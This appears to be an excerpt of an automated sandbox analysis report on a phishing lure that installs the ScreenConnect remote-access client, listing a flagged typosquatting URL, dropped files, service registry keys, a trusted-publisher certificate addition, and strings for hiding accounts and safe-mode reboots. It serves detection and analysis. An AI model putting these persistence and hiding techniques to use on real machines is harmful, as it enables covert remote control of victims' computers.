              Source: ScreenConnect.ClientService.dll.14.drStatic PE information: 0xF0DD68C1 [Mon Jan 20 07:41:53 2098 UTC]
              Source: chromecache_128.1.drStatic PE information: real checksum: 0x177d1 should be: 0x175ce
              Source: bfb7a509-8b20-4376-b9ba-bfeeb014e662.tmp.0.drStatic PE information: real checksum: 0x177d1 should be: 0x48de
              Source: Unconfirmed 974768.crdownload.0.drStatic PE information: real checksum: 0x177d1 should be: 0x175ce

              Persistence and Installation Behavior

              Source: EmailJoeBoxAI: AI detected Brand spoofing attempt in URL: URL: https://cp9856.chelokipotlester.icu
              Source: EmailJoeBoxAI: AI detected Typosquatting in URL: URL: https://cp9856.chelokipotlester.icu
              Source: EmailJoeBoxAI: AI detected suspicious URL: URL: https://cp9856.chelokipotlester.icu
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\Downloads\support.Client.exe (copy)
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\VPHPX4NN.BTC\4JXNCLAQ.OW1\ScreenConnect.WindowsClient.exe
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: Chrome Cache Entry: 128
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\VPHPX4NN.BTC\4JXNCLAQ.OW1\ScreenConnect.Core.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\VPHPX4NN.BTC\4JXNCLAQ.OW1\ScreenConnect.Client.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\VPHPX4NN.BTC\4JXNCLAQ.OW1\ScreenConnect.WindowsFileManager.exe
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\VPHPX4NN.BTC\4JXNCLAQ.OW1\ScreenConnect.ClientService.exe
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..dows_4b14c015c87c1ad8_0017.0009_none_6a433ce92d10b8e9\ScreenConnect.Windows.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\VPHPX4NN.BTC\4JXNCLAQ.OW1\ScreenConnect.Windows.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre...exe_25b0fbb6ef7eb094_0017.0009_none_aa62037c34f7a445\ScreenConnect.WindowsFileManager.exe
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..ient_4b14c015c87c1ad8_0017.0009_none_c7123e2bd9a688c6\ScreenConnect.WindowsClient.exe
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre...exe_25b0fbb6ef7eb094_0017.0009_none_aa62037c34f7a445\ScreenConnect.WindowsBackstageShell.exe
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\VPHPX4NN.BTC\4JXNCLAQ.OW1\ScreenConnect.WindowsBackstageShell.exe
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\Downloads\Unconfirmed 974768.crdownload
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..core_4b14c015c87c1ad8_0017.0009_none_65cb6507f0c2a5b9\ScreenConnect.Core.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..vice_4b14c015c87c1ad8_0017.0009_none_171efd5086820924\ScreenConnect.ClientService.dll
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\Downloads\bfb7a509-8b20-4376-b9ba-bfeeb014e662.tmp
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\VPHPX4NN.BTC\4JXNCLAQ.OW1\ScreenConnect.ClientService.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..ient_4b14c015c87c1ad8_0017.0009_none_fbe0c2da0011fbbd\ScreenConnect.Client.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre...exe_25b0fbb6ef7eb094_0017.0009_none_aa62037c34f7a445\ScreenConnect.ClientService.exe
              Source: ScreenConnect.ClientService.dll0.14.drBinary or memory string: bcdedit.exeg/copy {current} /d "Reboot and Reconnect Safe Mode"7{.{8}-.{4}-.{4}-.{4}-.{12}}
              Source: ScreenConnect.ClientService.dll.14.drBinary or memory string: bcdedit.exeg/copy {current} /d "Reboot and Reconnect Safe Mode"7{.{8}-.{4}-.{4}-.{4}-.{12}}
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Application
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeRegistry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\ScreenConnect Client (5999b697-2fc8-47f6-a1dc-4d0d274c363e)
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

              Hooking and other Techniques for Hiding and Protection

              Source: ScreenConnect.WindowsClient.exe, 00000011.00000002.1949508964.000000001BB02000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
              Source: ScreenConnect.ClientService.exe, 00000012.00000002.1943559410.0000000002E62000.00000002.00000001.01000000.0000000E.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
              Source: ScreenConnect.WindowsClient.exe, 00000014.00000002.2409619705.0000000003041000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
              Source: ScreenConnect.WindowsClient.exe, 00000015.00000002.2004992616.00000000010D0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
              Source: ScreenConnect.WindowsClient.exe, 00000015.00000002.2005207241.0000000002A71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
              Source: ScreenConnect.Windows.dll.14.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
              Source: ScreenConnect.ClientService.dll0.14.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
              Source: ScreenConnect.Windows.dll0.14.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
              Source: ScreenConnect.ClientService.dll.14.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
              Source: C:\Users\user\Downloads\support.Client.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C Blob
              Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Windows Defender\MpCmdRun.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Memory allocated: 212A1610000 memory reserve | memory write watch
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Memory allocated: 212BB220000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exe Memory allocated: C80000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exe Memory allocated: 1AA50000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exe Memory allocated: 1480000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exe Memory allocated: 30C0000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exe Memory allocated: 14E0000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exe Memory allocated: 1790000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exe Memory allocated: 1F80000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exe Memory allocated: 1DC0000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exe Memory allocated: 1670000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exe Memory allocated: 1B040000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exe Memory allocated: 1080000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exe Memory allocated: 1AA70000 memory reserve | memory write watch
              Source: C:\Windows\System32\svchost.exe File opened / queried: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
